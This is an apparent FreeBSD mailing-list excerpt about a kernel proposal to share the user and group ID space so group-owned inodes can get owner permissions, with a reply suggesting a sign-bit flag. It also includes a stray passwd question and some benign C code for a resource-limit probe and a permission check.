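 * 1 cap kept but malloc() refused, 2 setup failed, 3 cap was lost. */
static int probe_child(rlim_t datasize, size_t bytes)
{
    struct rlimit after;
    /* Drop to our own ids so the probe also works when not run as root. */
    if (limit_then_drop(datasize, getuid(), getgid()) != 0)
        return 2;
    if (getrlimit(RLIMIT_DATA, &after) != 0 || after.rlim_cur != datasize)
        return 3;
    char *p = malloc(bytes);
    if (p == NULL)
        return 1;
    memset(p, 0xa5, bytes);         /* touch it so the pages really exist */
    free(p);
    return 0;
}

/* Cap the data segment at `datasize`, drop identity, then try to allocate
 * `bytes`, all in a forked child so the caller keeps its own limits.
 * Returns 1 if the cap survived and the allocation succeeded, 0 if the cap
 * survived but malloc() refused, -1 on any probe failure.  Whether an
 * over-cap request is refused depends on whether the allocator grows the
 * heap with brk() or maps with mmap(), the caveat raised in the thread. */
int probe_datasize(rlim_t datasize, size_t bytes)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(probe_child(datasize, bytes));
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    if (WEXITSTATUS(status) == 0)
        return 1;
    return WEXITSTATUS(status) == 1 ? 0 : -1;
}
```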
From: Sergey Babkin
To: security@freebsd.org, Wes Peters, Robert Watson, fs@freebsd.org
Subject: about common group & user ID space (PR kern/14584)

All,

I want to commit PR kern/14584. I've been told that it's good to discuss it
in -arch, -security and -fs. (It has been sort of discussed on -hackers
already; there were not many replies.) So I've posted a message on -arch,
and now on -security and -fs. I've also discussed this idea shortly with
Kirk McKusick at Usenix-2000 at the BSD BOF and he generally liked it and
suggested reviewing it further.

There is a rather long description in the PR. In short, the idea is that
all the IDs above some value get shared by both users and groups. That is,
not only can two users not have the same ID (unless they are just aliases,
like root and toor) and two groups not have the same ID, but a user and a
group can't have the same ID either. This allows using the UID field in
the inodes to give permissions in the unified UID&GID space, and thus give
two groups (say, "writers" and "readers") different permissions to the
file without resorting to trickery with subdirectories. The ID space below
this value is kept separate for UIDs and GIDs for compatibility with the
historic IDs.

In the patch this feature is enabled by a kernel compilation option, plus
even with this option compiled a sysctl has to be set. So it would not
affect unsuspecting users.

Why not leave it to the real ACLs? The problem I see with ACLs is that they
break all the standard Unix commands dealing with displaying or storing the
permissions, such as ls, tar, cpio and others of this sort. Probably the
ACLs are _the_ way to go for the high-security environments.
But from my personal experience with systems administration of HP-UX and
NetWare in not-so-high-security environments, the careless application of
ACLs tends to cause quite a systems administration nightmare. So I
personally would avoid them for as long as possible and use them only when
really necessary. And that seems to be not only my experience. For example,
in UnixWare the ACLs were implemented and then essentially scrapped (never
ported to VxFS and left working only as remnants in SFS, a version of FFS
with ACLs which does not seem to be used by anyone any more and which may
not be used as a root filesystem any more).

This is the reason why I think that the classic Unix permissions still
have a long life ahead, so some backwards-compatible extensions to them
might be quite usable.

Any comments are welcome.

-SB

From owner-freebsd-security Sat Mar 17 22:32:15 2001
Message-Id: <3.0.32.20010318144200.006c4098@smtp.magix.com.sg>
Date: Sun, 18 Mar 2001 14:42:00 +0800
To: freebsd-security@freebsd.org
From: Spades
Subject: passwd problem

# passwd
Warning: configuration file missing; please run 'tconf'
Unable to update EPS password.
Password changed.

How do I reinstall passwd or fix this?

From owner-freebsd-security Sat Mar 17 23:38:57 2001
From: Terry Lambert
Message-Id: <200103180738.AAA03250@usr05.primenet.com>
Subject: Re: about common group & user ID space (PR kern/14584)
To: babkin@bellatlantic.net (Sergey Babkin)
Date: Sun, 18 Mar 2001 07:38:31 +0000 (GMT)
Cc: security@FreeBSD.ORG, wes@softweyr.com (Wes Peters), rwatson@FreeBSD.ORG (Robert Watson), fs@FreeBSD.ORG
In-Reply-To: <3AB3FC38.94711FFF@bellatlantic.net> from "Sergey Babkin" at Mar 17, 2001 07:07:20 PM

> I want to commit PR kern/14584. I've been told that it's good
> to discuss it in -arch, -security and -fs. (It has been sort of
> discussed on -hackers already; there were not many replies.)
> So I've posted a message on -arch, and now on -security and -fs.
> I've also discussed this idea shortly with Kirk McKusick at
> Usenix-2000 at the BSD BOF and he generally liked it and suggested
> reviewing it further.

You could do this a bit more cleanly by just stealing the sign bit, and
setting it if the uid field contained a group ID. There would be no
conversion problem for an existing system. The sign bit would not be
"stolen" unless the sysctl was in the "active" state. This changes the
check to a one line change, conditional on the high bit being set.

In trade, the "set group owner" code gets a bit more complicated, but
that's in the user space "chown" code, where you have to tell it to set a
group, explicitly (so that it will look up the group, not the user, for a
non-numeric ID, and set the high bit when stuffing it in the chown id
field).

Note that this change is really necessary in the user space code anyway:
even if you make the UID and GID numeric values not intersect, there is
still the possibility of a group and user having the same name, so a
set-by-name needs a separate flag (think "chown bin.bin foo", for
example).
The benefits of not having to grovel through the FS contents or do more
complex ID space transformations, and the moving of the majority of
changes to user space, combined with the fact that if you turn it off the
ownership doesn't need to be reverted, are all plusses.

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.
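Terry's sign-bit variant, as an added sketch that is not code from PR kern/14584 or from either mail: the inode's owner field keeps holding a uid unless its high bit is set, a sysctl-style flag decides whether that bit means anything at all (so existing on-disk ids are untouched when the feature is off), and the "writers" and "readers" case from Sergey's message falls out of the classic three-way permission check. The names (set_shared_ids, is_owner, effective_bits) and the gid values in the comments are chosen here.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define OWNER_IS_GROUP 0x80000000u   /* the "stolen" sign bit */
#define OWNER_ID_MASK  0x7fffffffu

/* Stands in for the sysctl: with it off, the high bit means nothing and
 * the owner field is read exactly as before. */
static bool shared_ids_active = false;
void set_shared_ids(bool on) { shared_ids_active = on; }

/* Process credentials as the check sees them: a uid and a group list
 * that includes the primary group. */
struct cred {
    uint32_t uid;
    const uint32_t *groups;
    size_t ngroups;
};

/* What user-space chown would store when told, explicitly, that the new
 * owner is a group rather than a user. */
uint32_t owner_from_gid(uint32_t gid) { return (gid & OWNER_ID_MASK) | OWNER_IS_GROUP; }
uint32_t owner_from_uid(uint32_t uid) { return uid & OWNER_ID_MASK; }

static bool in_groups(const struct cred *c, uint32_t gid)
{
    for (size_t i = 0; i < c->ngroups; i++)
        if (c->groups[i] == gid)
            return true;
    return false;
}

/* The one-line kernel change: an inode whose owner field has the high bit
 * set is "owned" by every member of that group.  Anything else, and
 * everything when the feature is off, is the classic uid comparison. */
bool is_owner(const struct cred *c, uint32_t owner)
{
    if (shared_ids_active && (owner & OWNER_IS_GROUP))
        return in_groups(c, owner & OWNER_ID_MASK);
    return c->uid == owner;
}

/* Classic three-way permission selection, returning the rwx triplet that
 * applies to this credential.  With a group-owned inode the owner bits
 * serve a second group: e.g. mode 0640 gives "writers" rw, "readers" r,
 * everyone else nothing, with no subdirectory trickery. */
unsigned effective_bits(const struct cred *c, uint32_t owner, uint32_t group, unsigned mode)
{
    if (is_owner(c, owner))
        return (mode >> 6) & 7;
    if (in_groups(c, group))
        return (mode >> 3) & 7;
    return mode & 7;
}
```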